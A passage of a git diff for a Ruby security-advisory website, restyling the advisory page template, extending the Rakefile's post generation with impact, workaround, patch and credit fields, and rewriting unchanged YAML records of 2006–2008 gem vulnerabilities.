diff --git a/Rakefile b/Rakefile
index a1f8f6f4..c3106846 100644
--- a/Rakefile
+++ b/Rakefile
@@ -24,13 +24,41 @@ namespace :advisories do
       slug = "#{advisory['date']}-#{id}"
       post = File.join('advisories', '_posts', "#{slug}.md")
 
+      # Enhanced advisory processing with Rails Security format support
+      enhanced_advisory = advisory.dup
+      
+      # Process description for better formatting
+      if enhanced_advisory['description']
+        enhanced_advisory['description'] = enhanced_advisory['description'].strip
+      end
+      
+      # Add impact section if available
+      if advisory['impact']
+        enhanced_advisory['impact'] = advisory['impact'].strip
+      end
+      
+      # Add workarounds section if available  
+      if advisory['workarounds']
+        enhanced_advisory['workarounds'] = advisory['workarounds'].strip
+      end
+      
+      # Process patches if available
+      if advisory['patches']
+        enhanced_advisory['patches'] = advisory['patches']
+      end
+      
+      # Process credits if available
+      if advisory['credits']
+        enhanced_advisory['credits'] = advisory['credits']
+      end
+
       File.open(post, 'w') do |file|
         header = {
           'layout'     => 'advisory',
           'title'      => "#{id} (#{advisory['gem']}): #{advisory['title']}",
           'comments'   => false,
           'categories' => [advisory['gem'], advisory['library'], advisory['framework'], advisory['platform']].compact,
-          'advisory'   => advisory
+          'advisory'   => enhanced_advisory
         }
 
         YAML.dump(header, file)
diff --git a/_includes/head.html b/_includes/head.html
index 2de27189..4f4a77a0 100644
--- a/_includes/head.html
+++ b/_includes/head.html
@@ -23,6 +23,7 @@
   <link href="{{ root_url }}/assets/bootstrap/css/bootstrap-responsive.min.css" rel="stylesheet" type="text/css">
   <link href="{{ root_url }}/assets/bootstrap/css/custom.css" rel="stylesheet" type="text/css">
   <link href="{{ root_url }}/assets/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css">
+  <link href="{{ root_url }}/assets/css/advisory.css" rel="stylesheet" type="text/css">
   
   <link href="{{ site.subscribe_rss }}" rel="alternate" title="{{ site.title }}" type="application/atom+xml">
 
diff --git a/_layouts/advisory.html b/_layouts/advisory.html
index 0b9f6508..ba373023 100644
--- a/_layouts/advisory.html
+++ b/_layouts/advisory.html
@@ -2,35 +2,44 @@
 layout: post
 ---
 
-<h3>ADVISORIES</h3>
+<div class="advisory-header">
+  <h2>{{ page.advisory.title }}</h2>
+  {% if page.advisory.date %}
+    <p class="advisory-date"><strong>Published:</strong> {{ page.advisory.date | date: "%B %d, %Y" }}</p>
+  {% endif %}
+</div>
 
-<ul>
+<h3>SECURITY IDENTIFIERS</h3>
+
+<ul class="advisory-identifiers">
 {% if page.advisory.cve %}
 <li>
-  <a href="https://www.cve.org/CVERecord?id=CVE-{{ page.advisory.cve }}">CVE-{{ page.advisory.cve }}</a>
+  <strong>CVE:</strong> <a href="https://www.cve.org/CVERecord?id=CVE-{{ page.advisory.cve }}">CVE-{{ page.advisory.cve }}</a>
   (<a href="https://nvd.nist.gov/vuln/detail/CVE-{{ page.advisory.cve }}">NVD</a>)
 </li>
 {% endif %}
 
 {% if page.advisory.ghsa %}
 <li>
-  <a href="https://github.com/advisories/GHSA-{{ page.advisory.ghsa }}">GHSA-{{ page.advisory.ghsa }}</a>
+  <strong>GHSA:</strong> <a href="https://github.com/advisories/GHSA-{{ page.advisory.ghsa }}">GHSA-{{ page.advisory.ghsa }}</a>
 </li>
 {% endif %}
 
 {% if page.advisory.osvdb %}
 <li>
-  OSVDB-{{ page.advisory.osvdb }}
+  <strong>OSVDB:</strong> OSVDB-{{ page.advisory.osvdb }}
 </li>
 {% endif %}
 
+{% if page.advisory.url %}
 {% unless page.advisory.url contains 'osvdb.org' or page.advisory.url contains 'nvd.nist.gov'
    or page.advisory.url contains 'cve.mitre.org' or page.advisory.url contains 'cve.org'
    or page.advisory.url contains 'github.com/advisories' %}
 <li>
-  <a href="{{ page.advisory.url }}">Vendor Advisory</a>
+  <strong>Vendor Advisory:</strong> <a href="{{ page.advisory.url }}">{{ page.advisory.url }}</a>
 </li>
 {% endunless %}
+{% endif %}
 </ul>
 
 <h3>GEM</h3>
@@ -90,61 +99,113 @@ <h3>PLATFORM</h3>
 {% if page.advisory.cvss_v2 or page.advisory.cvss_v3 %}
 <h3>SEVERITY</h3>
 
+<div class="severity-section">
 {% if page.advisory.cvss_v3 %}
 {% assign cvss_v3 = page.advisory.cvss_v3 %}
-<p><a href="https://www.first.org/cvss/">CVSS v3.x</a>: {{ cvss_v3 }} (
-  {%- if cvss_v3 == 0.0 -%}
-    None
-  {%- elsif cvss_v3 >= 0.1 and cvss_v3 <= 3.9 -%}
-    Low
-  {%- elsif cvss_v3 >= 4.0 and cvss_v3 <= 6.9 -%}
-    <span style="color: #FFB507;">Medium</span>
-  {%- elsif cvss_v3 >= 7.0 and cvss_v3 <= 8.9 -%}
-    <span style="color: #FF6900;"><strong>High</strong></span>
-  {%- elsif cvss_v3 >= 9.0 and cvss_v3 <= 10.0 -%}
-    <span style="color: #D5011B;"><strong>Critical</strong></span>
-  {%- endif -%}
-)</p>
+<div class="cvss-score">
+  <p><strong><a href="https://www.first.org/cvss/">CVSS v3.x</a>:</strong> {{ cvss_v3 }} (
+    {%- if cvss_v3 == 0.0 -%}
+      <span class="severity-none">None</span>
+    {%- elsif cvss_v3 >= 0.1 and cvss_v3 <= 3.9 -%}
+      <span class="severity-low">Low</span>
+    {%- elsif cvss_v3 >= 4.0 and cvss_v3 <= 6.9 -%}
+      <span class="severity-medium">Medium</span>
+    {%- elsif cvss_v3 >= 7.0 and cvss_v3 <= 8.9 -%}
+      <span class="severity-high">High</span>
+    {%- elsif cvss_v3 >= 9.0 and cvss_v3 <= 10.0 -%}
+      <span class="severity-critical">Critical</span>
+    {%- endif -%}
+  )</p>
+</div>
 {% endif %}
+
 {% if page.advisory.cvss_v2 %}
 {% assign cvss_v2 = page.advisory.cvss_v2 %}
-<p><a href="https://www.first.org/cvss/v2/">CVSS v2.0</a>: {{ cvss_v2 }} (
-  {%- if cvss_v2 >= 0.0 and cvss_v2 <= 3.9 -%}
-    Low
-  {%- elsif cvss_v2 >= 4.0 and cvss_v2 <= 6.9 -%}
-    <span style="color: #FFB507;">Medium</span>
-  {%- elsif cvss_v2 >= 7.0 and cvss_v2 <= 10.0 -%}
-    <span style="color: #D5011B;"><strong>High</strong></span>
-  {%- endif -%}
-)</p>
+<div class="cvss-score">
+  <p><strong><a href="https://www.first.org/cvss/v2/">CVSS v2.0</a>:</strong> {{ cvss_v2 }} (
+    {%- if cvss_v2 >= 0.0 and cvss_v2 <= 3.9 -%}
+      <span class="severity-low">Low</span>
+    {%- elsif cvss_v2 >= 4.0 and cvss_v2 <= 6.9 -%}
+      <span class="severity-medium">Medium</span>
+    {%- elsif cvss_v2 >= 7.0 and cvss_v2 <= 10.0 -%}
+      <span class="severity-high">High</span>
+    {%- endif -%}
+  )</p>
+</div>
 {% endif %}
+</div>
 {% endif %}
 
 {% if page.advisory.unaffected_versions %}
 <h3>UNAFFECTED VERSIONS</h3>
 
-<ul>
+<div class="version-list">
   {% for version in page.advisory.unaffected_versions %}
-  <li><kbd>{{ version | escape }}</kbd></li>
+  <span class="version-badge unaffected"><code>{{ version | escape }}</code></span>
   {% endfor %}
-</ul>
+</div>
 {% endif %}
 
 <h3>PATCHED VERSIONS</h3>
 
+<div class="version-list">
 {% if page.advisory.patched_versions %}
-<ul>
   {% for version in page.advisory.patched_versions %}
-  <li><kbd>{{ version | escape }}</kbd></li>
+  <span class="version-badge patched"><code>{{ version | escape }}</code></span>
   {% endfor %}
-</ul>
 {% else %}
-<p>None.</p>
+  <p class="no-patches">None available.</p>
 {% endif %}
+</div>
 
 <h3>DESCRIPTION</h3>
 
+<div class="advisory-description">
 {{ page.advisory.description | xml_escape | markdownify }}
+</div>
+
+{% if page.advisory.impact %}
+<h3>IMPACT</h3>
+
+<div class="advisory-impact">
+{{ page.advisory.impact | xml_escape | markdownify }}
+</div>
+{% endif %}
+
+{% if page.advisory.workarounds %}
+<h3>WORKAROUNDS</h3>
+
+<div class="advisory-workarounds">
+{{ page.advisory.workarounds | xml_escape | markdownify }}
+</div>
+{% endif %}
+
+{% if page.advisory.patches %}
+<h3>PATCHES</h3>
+
+<ul class="patch-list">
+{% for patch in page.advisory.patches %}
+  <li><a href="{{ patch.url }}">{{ patch.name | default: patch.url }}</a></li>
+{% endfor %}
+</ul>
+{% endif %}
+
+{% if page.advisory.credits %}
+<h3>CREDITS</h3>
+
+<div class="advisory-credits">
+{% if page.advisory.credits.size > 0 %}
+  <p>Thank you to the following security researchers:</p>
+  <ul>
+  {% for credit in page.advisory.credits %}
+    <li>{{ credit }}</li>
+  {% endfor %}
+  </ul>
+{% else %}
+  <p>{{ page.advisory.credits }}</p>
+{% endif %}
+</div>
+{% endif %}
 
 {% if page.advisory.related %}
 <h3>RELATED</h3>
diff --git a/advisories/_posts/2006-05-14-CVE-2006-2581.md b/advisories/_posts/2006-05-14-CVE-2006-2581.md
index 1348a39c..2b318998 100644
--- a/advisories/_posts/2006-05-14-CVE-2006-2581.md
+++ b/advisories/_posts/2006-05-14-CVE-2006-2581.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2006-2581 (rwiki): RWiki before 2.1.1 has cross-site scripting vulnerability'
-comments: false
-categories:
-- rwiki
-advisory:
-  gem: rwiki
-  cve: 2006-2581
-  ghsa: gvhx-gj42-m28v
-  url: https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
-  title: RWiki before 2.1.1 has cross-site scripting vulnerability
-  date: 2006-05-14
-  description: |
-    Cross-site scripting (XSS) vulnerability in Wiki content in
-    RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to inject
-    arbitrary web script or HTML via unknown attack vectors.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "< 2.1.0pre1"
-  patched_versions:
-  - ">= 2.1.1"
-  related:
-    cve:
-    - 2006-2582
-    ghsa:
-    - wwmf-6p58-6vj2
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2006-2581
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/26664
-    - https://github.com/advisories/GHSA-wwmf-6p58-6vj2
-    - https://github.com/advisories/GHSA-gvhx-gj42-m28v
-    - https://rubygems.org/gems/rwiki
-    - https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
-    - https://web.archive.org/web/20090504061152/http://pub.cozmixng.org/~the-rwiki/rw-cgi.rb?cmd=view;name=top
-    - https://web.archive.org/web/20081201080215/http://secunia.com/advisories/20264
-    - https://web.archive.org/web/20090524010623/http://www.vupen.com/english/advisories/2006/1949
-  notes: |
-    - Best references are in Japanese.
-    - Source code link on rubygems.org goes to
-      lucassus/rwiki (last version 0.2.5, not 2.1.1).
-    - Found two other repos:
-      - https://github.com/rwiki/rwiki
-      - https://github.com/ytakhs/rwiki
-    - CWE: [NVD-CWE-Other] MODERATE
----
+---
+layout: advisory
+title: 'CVE-2006-2581 (rwiki): RWiki before 2.1.1 has cross-site scripting vulnerability'
+comments: false
+categories:
+- rwiki
+advisory:
+  gem: rwiki
+  cve: 2006-2581
+  ghsa: gvhx-gj42-m28v
+  url: https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
+  title: RWiki before 2.1.1 has cross-site scripting vulnerability
+  date: 2006-05-14
+  description: |
+    Cross-site scripting (XSS) vulnerability in Wiki content in
+    RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to inject
+    arbitrary web script or HTML via unknown attack vectors.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "< 2.1.0pre1"
+  patched_versions:
+  - ">= 2.1.1"
+  related:
+    cve:
+    - 2006-2582
+    ghsa:
+    - wwmf-6p58-6vj2
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2006-2581
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/26664
+    - https://github.com/advisories/GHSA-wwmf-6p58-6vj2
+    - https://github.com/advisories/GHSA-gvhx-gj42-m28v
+    - https://rubygems.org/gems/rwiki
+    - https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
+    - https://web.archive.org/web/20090504061152/http://pub.cozmixng.org/~the-rwiki/rw-cgi.rb?cmd=view;name=top
+    - https://web.archive.org/web/20081201080215/http://secunia.com/advisories/20264
+    - https://web.archive.org/web/20090524010623/http://www.vupen.com/english/advisories/2006/1949
+  notes: |
+    - Best references are in Japanese.
+    - Source code link on rubygems.org goes to
+      lucassus/rwiki (last version 0.2.5, not 2.1.1).
+    - Found two other repos:
+      - https://github.com/rwiki/rwiki
+      - https://github.com/ytakhs/rwiki
+    - CWE: [NVD-CWE-Other] MODERATE
+---
diff --git a/advisories/_posts/2006-05-14-CVE-2006-2582.md b/advisories/_posts/2006-05-14-CVE-2006-2582.md
index 9b39c62f..cf59da90 100644
--- a/advisories/_posts/2006-05-14-CVE-2006-2582.md
+++ b/advisories/_posts/2006-05-14-CVE-2006-2582.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2006-2582 (rwiki): High severity vulnerability that affects rwiki'
-comments: false
-categories:
-- rwiki
-advisory:
-  gem: rwiki
-  cve: 2006-2582
-  ghsa: wwmf-6p58-6vj2
-  url: https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
-  title: High severity vulnerability that affects rwiki
-  date: 2006-05-14
-  description: |
-    The editing form in RWiki 2.1.0pre1 through 2.1.0 allows remote
-    attackers to execute arbitrary Ruby code via unknown attack vectors.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 2.1.0pre1"
-  patched_versions:
-  - ">= 2.1.1"
-  related:
-    cve:
-    - 2006-2581
-    ghsa:
-    - gvhx-gj42-m28v
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2006-2582
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/26664
-    - https://github.com/advisories/GHSA-wwmf-6p58-6vj2
-    - https://github.com/advisories/GHSA-gvhx-gj42-m28v
-    - https://rubygems.org/gems/rwiki
-    - https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
-    - https://web.archive.org/web/20090504061152/http://pub.cozmixng.org/~the-rwiki/rw-cgi.rb?cmd=view;name=top
-    - https://web.archive.org/web/20081201080215/http://secunia.com/advisories/20264
-    - https://web.archive.org/web/20090524010623/http://www.vupen.com/english/advisories/2006/1949
-  notes: |
-    - Best references are in Japanese.
-    - Source code link on rubygems.org goes to
-      lucassus/rwiki (last version 0.2.5, not 2.1.1).
-    - Found two other repos:
-      - https://github.com/rwiki/rwiki
-      - https://github.com/ytakhs/rwiki
-    - CWE: [NVD-CWE-Other] MODERATE
----
+---
+layout: advisory
+title: 'CVE-2006-2582 (rwiki): High severity vulnerability that affects rwiki'
+comments: false
+categories:
+- rwiki
+advisory:
+  gem: rwiki
+  cve: 2006-2582
+  ghsa: wwmf-6p58-6vj2
+  url: https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
+  title: High severity vulnerability that affects rwiki
+  date: 2006-05-14
+  description: |
+    The editing form in RWiki 2.1.0pre1 through 2.1.0 allows remote
+    attackers to execute arbitrary Ruby code via unknown attack vectors.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 2.1.0pre1"
+  patched_versions:
+  - ">= 2.1.1"
+  related:
+    cve:
+    - 2006-2581
+    ghsa:
+    - gvhx-gj42-m28v
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2006-2582
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/26664
+    - https://github.com/advisories/GHSA-wwmf-6p58-6vj2
+    - https://github.com/advisories/GHSA-gvhx-gj42-m28v
+    - https://rubygems.org/gems/rwiki
+    - https://web.archive.org/web/20090501134922/http://www2a.biglobe.ne.jp/~seki/ruby/rwiki.html
+    - https://web.archive.org/web/20090504061152/http://pub.cozmixng.org/~the-rwiki/rw-cgi.rb?cmd=view;name=top
+    - https://web.archive.org/web/20081201080215/http://secunia.com/advisories/20264
+    - https://web.archive.org/web/20090524010623/http://www.vupen.com/english/advisories/2006/1949
+  notes: |
+    - Best references are in Japanese.
+    - Source code link on rubygems.org goes to
+      lucassus/rwiki (last version 0.2.5, not 2.1.1).
+    - Found two other repos:
+      - https://github.com/rwiki/rwiki
+      - https://github.com/ytakhs/rwiki
+    - CWE: [NVD-CWE-Other] MODERATE
+---
diff --git a/advisories/_posts/2007-01-22-CVE-2007-0469.md b/advisories/_posts/2007-01-22-CVE-2007-0469.md
index 1dd3975d..ada57e47 100644
--- a/advisories/_posts/2007-01-22-CVE-2007-0469.md
+++ b/advisories/_posts/2007-01-22-CVE-2007-0469.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2007-0469 (rubygems-update): CVE-2007-0469 RubyGems: Specially-crafted
-  Gem archive can overwrite system files'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2007-0469
-  osvdb: 33561
-  ghsa: 95vx-q4c2-64gr
-  url: https://nvd.nist.gov/vuln/detail/CVE-2007-0469
-  title: 'CVE-2007-0469 RubyGems: Specially-crafted Gem archive can overwrite system
-    files'
-  date: 2007-01-22
-  description: |
-    The extract_files function in installer.rb in RubyGems before 0.9.1 does
-    not check whether files exist before overwriting them, which allows user-assisted
-    remote attackers to overwrite arbitrary files, cause a denial of service, or execute
-    arbitrary code via crafted GEM packages.
-  cvss_v2: 9.3
-  patched_versions:
-  - ">= 0.9.1"
----
+---
+layout: advisory
+title: 'CVE-2007-0469 (rubygems-update): CVE-2007-0469 RubyGems: Specially-crafted
+  Gem archive can overwrite system files'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2007-0469
+  osvdb: 33561
+  ghsa: 95vx-q4c2-64gr
+  url: https://nvd.nist.gov/vuln/detail/CVE-2007-0469
+  title: 'CVE-2007-0469 RubyGems: Specially-crafted Gem archive can overwrite system
+    files'
+  date: 2007-01-22
+  description: |
+    The extract_files function in installer.rb in RubyGems before 0.9.1 does
+    not check whether files exist before overwriting them, which allows user-assisted
+    remote attackers to overwrite arbitrary files, cause a denial of service, or execute
+    arbitrary code via crafted GEM packages.
+  cvss_v2: 9.3
+  patched_versions:
+  - ">= 0.9.1"
+---
diff --git a/advisories/_posts/2007-05-21-OSVDB-101157.md b/advisories/_posts/2007-05-21-OSVDB-101157.md
index df4b2e1f..34acf1bf 100644
--- a/advisories/_posts/2007-05-21-OSVDB-101157.md
+++ b/advisories/_posts/2007-05-21-OSVDB-101157.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-101157 (json): json Gem for Ruby Data Handling Stack Buffer Overflow'
-comments: false
-categories:
-- json
-advisory:
-  gem: json
-  osvdb: 101157
-  url: https://security.snyk.io/vuln/SNYK-RUBY-JSON-20000
-  title: json Gem for Ruby Data Handling Stack Buffer Overflow
-  date: 2007-05-21
-  description: |
-    json Gem for Ruby contains an overflow condition that is triggered as
-    user-supplied input is not properly validated when handling specially crafted
-    data. This may allow a remote attacker to cause a stack-based buffer
-    overflow, resulting in a denial of service or potentially allowing the
-    execution of arbitrary code.
-  patched_versions:
-  - ">= 1.1.0"
-  related:
-    url:
-    - https://security.snyk.io/vuln/SNYK-RUBY-JSON-20000
-    - http://osvdb.org/show/osvdb/101157
----
+---
+layout: advisory
+title: 'OSVDB-101157 (json): json Gem for Ruby Data Handling Stack Buffer Overflow'
+comments: false
+categories:
+- json
+advisory:
+  gem: json
+  osvdb: 101157
+  url: https://security.snyk.io/vuln/SNYK-RUBY-JSON-20000
+  title: json Gem for Ruby Data Handling Stack Buffer Overflow
+  date: 2007-05-21
+  description: |
+    json Gem for Ruby contains an overflow condition that is triggered as
+    user-supplied input is not properly validated when handling specially crafted
+    data. This may allow a remote attacker to cause a stack-based buffer
+    overflow, resulting in a denial of service or potentially allowing the
+    execution of arbitrary code.
+  patched_versions:
+  - ">= 1.1.0"
+  related:
+    url:
+    - https://security.snyk.io/vuln/SNYK-RUBY-JSON-20000
+    - http://osvdb.org/show/osvdb/101157
+---
diff --git a/advisories/_posts/2007-06-15-OSVDB-95668.md b/advisories/_posts/2007-06-15-OSVDB-95668.md
index 8b889e36..1ef6b108 100644
--- a/advisories/_posts/2007-06-15-OSVDB-95668.md
+++ b/advisories/_posts/2007-06-15-OSVDB-95668.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-95668 (builder): Builder Gem for Ruby Tag Name Handling Private Method
-  Exposure'
-comments: false
-categories:
-- builder
-advisory:
-  gem: builder
-  osvdb: 95668
-  url: https://my.diffend.io/gems/builder/2.1.1/2.1.2
-  title: Builder Gem for Ruby Tag Name Handling Private Method Exposure
-  date: 2007-06-15
-  description: |
-    Builder Gem for Ruby contains a flaw in the handling of tag names. The issue
-    is triggered when the program reads tag names from XML data and then calls a
-    method with that name. With a specially crafted file, a context-dependent
-    attacker can call private methods and manipulate data.
-  patched_versions:
-  - ">= 2.1.2"
-  related:
-    url:
-    - https://my.diffend.io/gems/builder/2.1.1/2.1.2
-    - http://osvdb.org/show/osvdb/95668
----
+---
+layout: advisory
+title: 'OSVDB-95668 (builder): Builder Gem for Ruby Tag Name Handling Private Method
+  Exposure'
+comments: false
+categories:
+- builder
+advisory:
+  gem: builder
+  osvdb: 95668
+  url: https://my.diffend.io/gems/builder/2.1.1/2.1.2
+  title: Builder Gem for Ruby Tag Name Handling Private Method Exposure
+  date: 2007-06-15
+  description: |
+    Builder Gem for Ruby contains a flaw in the handling of tag names. The issue
+    is triggered when the program reads tag names from XML data and then calls a
+    method with that name. With a specially crafted file, a context-dependent
+    attacker can call private methods and manipulate data.
+  patched_versions:
+  - ">= 2.1.2"
+  related:
+    url:
+    - https://my.diffend.io/gems/builder/2.1.1/2.1.2
+    - http://osvdb.org/show/osvdb/95668
+---
diff --git a/advisories/_posts/2007-11-27-CVE-2007-6183.md b/advisories/_posts/2007-11-27-CVE-2007-6183.md
index 1a0ffd83..e49564e9 100644
--- a/advisories/_posts/2007-11-27-CVE-2007-6183.md
+++ b/advisories/_posts/2007-11-27-CVE-2007-6183.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2007-6183 (gtk2): CVE-2007-6183 ruby-gnome2: format string vulnerability'
-comments: false
-categories:
-- gtk2
-advisory:
-  gem: gtk2
-  cve: 2007-6183
-  osvdb: 40774
-  ghsa: xgj6-pgrm-x4r2
-  url: https://nvd.nist.gov/vuln/detail/CVE-2007-6183
-  title: 'CVE-2007-6183 ruby-gnome2: format string vulnerability'
-  date: 2007-11-27
-  description: |
-    Format string vulnerability in the mdiag_initialize function in gtk/src/rbgtkmessagedialog.c
-    in Ruby-GNOME 2 (aka Ruby/Gnome2) 0.16.0, and SVN versions before 20071127, allows
-    context-dependent attackers to execute arbitrary code via format string specifiers
-    in the message parameter.
-  cvss_v2: 6.8
-  patched_versions:
-  - "> 0.16.0"
----
+---
+layout: advisory
+title: 'CVE-2007-6183 (gtk2): CVE-2007-6183 ruby-gnome2: format string vulnerability'
+comments: false
+categories:
+- gtk2
+advisory:
+  gem: gtk2
+  cve: 2007-6183
+  osvdb: 40774
+  ghsa: xgj6-pgrm-x4r2
+  url: https://nvd.nist.gov/vuln/detail/CVE-2007-6183
+  title: 'CVE-2007-6183 ruby-gnome2: format string vulnerability'
+  date: 2007-11-27
+  description: |
+    Format string vulnerability in the mdiag_initialize function in gtk/src/rbgtkmessagedialog.c
+    in Ruby-GNOME 2 (aka Ruby/Gnome2) 0.16.0, and SVN versions before 20071127, allows
+    context-dependent attackers to execute arbitrary code via format string specifiers
+    in the message parameter.
+  cvss_v2: 6.8
+  patched_versions:
+  - "> 0.16.0"
+---
diff --git a/advisories/_posts/2008-08-12-CVE-2008-7311.md b/advisories/_posts/2008-08-12-CVE-2008-7311.md
index 716d1cd7..c93c8bb9 100644
--- a/advisories/_posts/2008-08-12-CVE-2008-7311.md
+++ b/advisories/_posts/2008-08-12-CVE-2008-7311.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2008-7311 (spree): Spree Hardcoded config.action_controller_session Hash
-  Value Cryptographic Protection Weakness'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2008-7311
-  osvdb: 81506
-  ghsa: g466-57gh-cqfw
-  url: https://spreecommerce.com/blog/security-vulernability-session-cookie-store
-  title: Spree Hardcoded config.action_controller_session Hash Value Cryptographic
-    Protection Weakness
-  date: 2008-08-12
-  description: |
-    Spree contains a hardcoded flaw related to the
-    config.action_controller_session hash value. This may allow an attacker to
-    more easily bypass cryptographic protection.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.3.0"
----
+---
+layout: advisory
+title: 'CVE-2008-7311 (spree): Spree Hardcoded config.action_controller_session Hash
+  Value Cryptographic Protection Weakness'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2008-7311
+  osvdb: 81506
+  ghsa: g466-57gh-cqfw
+  url: https://spreecommerce.com/blog/security-vulernability-session-cookie-store
+  title: Spree Hardcoded config.action_controller_session Hash Value Cryptographic
+    Protection Weakness
+  date: 2008-08-12
+  description: |
+    Spree contains a hardcoded flaw related to the
+    config.action_controller_session hash value. This may allow an attacker to
+    more easily bypass cryptographic protection.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.3.0"
+---
diff --git a/advisories/_posts/2008-08-15-OSVDB-95749.md b/advisories/_posts/2008-08-15-OSVDB-95749.md
index 8a250277..a62abccf 100644
--- a/advisories/_posts/2008-08-15-OSVDB-95749.md
+++ b/advisories/_posts/2008-08-15-OSVDB-95749.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'OSVDB-95749 (activeresource): activeresource Gem for Ruby lib/active_resource/connection.rb
-  request Function Multiple Variable Format String'
-comments: false
-categories:
-- activeresource
-advisory:
-  gem: activeresource
-  osvdb: 95749
-  url: https://my.diffend.io/gems/activeresource/versions/2.1.0
-  title: activeresource Gem for Ruby lib/active_resource/connection.rb request Function
-    Multiple Variable Format String
-  date: 2008-08-15
-  description: |
-    activeresource contains a format string flaw in the request function of
-    lib/active_resource/connection.rb. The issue is triggered as format string
-    specifiers (e.g. %s and %x) are not properly sanitized in user-supplied input
-    when passed via the 'result.code' and 'result.message' variables. This may
-    allow a remote attacker to cause a denial of service or potentially execute
-    arbitrary code.
-  patched_versions:
-  - ">= 2.2.0"
-  related:
-    url:
-    - https://my.diffend.io/gems/activeresource/versions/2.1.0
-    - https://security.snyk.io/vuln/SNYK-RUBY-ACTIVERESOURCE-20004
-    - http://osvdb.org/show/osvdb/95749
----
+---
+layout: advisory
+title: 'OSVDB-95749 (activeresource): activeresource Gem for Ruby lib/active_resource/connection.rb
+  request Function Multiple Variable Format String'
+comments: false
+categories:
+- activeresource
+advisory:
+  gem: activeresource
+  osvdb: 95749
+  url: https://my.diffend.io/gems/activeresource/versions/2.1.0
+  title: activeresource Gem for Ruby lib/active_resource/connection.rb request Function
+    Multiple Variable Format String
+  date: 2008-08-15
+  description: |
+    activeresource contains a format string flaw in the request function of
+    lib/active_resource/connection.rb. The issue is triggered as format string
+    specifiers (e.g. %s and %x) are not properly sanitized in user-supplied input
+    when passed via the 'result.code' and 'result.message' variables. This may
+    allow a remote attacker to cause a denial of service or potentially execute
+    arbitrary code.
+  patched_versions:
+  - ">= 2.2.0"
+  related:
+    url:
+    - https://my.diffend.io/gems/activeresource/versions/2.1.0
+    - https://security.snyk.io/vuln/SNYK-RUBY-ACTIVERESOURCE-20004
+    - http://osvdb.org/show/osvdb/95749
+---
diff --git a/advisories/_posts/2008-09-22-CVE-2008-7310.md b/advisories/_posts/2008-09-22-CVE-2008-7310.md
index fc68fd35..78da1c42 100644
--- a/advisories/_posts/2008-09-22-CVE-2008-7310.md
+++ b/advisories/_posts/2008-09-22-CVE-2008-7310.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2008-7310 (spree): Spree Hash Restriction Weakness URL Parsing Order State
-  Value Manipulation'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2008-7310
-  osvdb: 81505
-  ghsa: 7h48-m3rw-vr27
-  url: https://spreecommerce.com/blog/security-vulnerability-mass-assignment
-  title: Spree Hash Restriction Weakness URL Parsing Order State Value Manipulation
-  date: 2008-09-22
-  description: |
-    Spree contains a hash restriction weakness that occurs when parsing a
-    modified URL. This may allow an attacker to manipulate order state values.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.3.0"
----
+---
+layout: advisory
+title: 'CVE-2008-7310 (spree): Spree Hash Restriction Weakness URL Parsing Order State
+  Value Manipulation'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2008-7310
+  osvdb: 81505
+  ghsa: 7h48-m3rw-vr27
+  url: https://spreecommerce.com/blog/security-vulnerability-mass-assignment
+  title: Spree Hash Restriction Weakness URL Parsing Order State Value Manipulation
+  date: 2008-09-22
+  description: |
+    Spree contains a hash restriction weakness that occurs when parsing a
+    modified URL. This may allow an attacker to manipulate order state values.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.3.0"
+---
diff --git a/advisories/_posts/2008-10-10-OSVDB-95376.md b/advisories/_posts/2008-10-10-OSVDB-95376.md
index c57a2f91..7ada1ad9 100644
--- a/advisories/_posts/2008-10-10-OSVDB-95376.md
+++ b/advisories/_posts/2008-10-10-OSVDB-95376.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-95376 (activerecord-oracle_enhanced-adapter): Oracle "enhanced" ActiveRecord
-  Gem for Ruby :limit / :offset SQL Injection'
-comments: false
-categories:
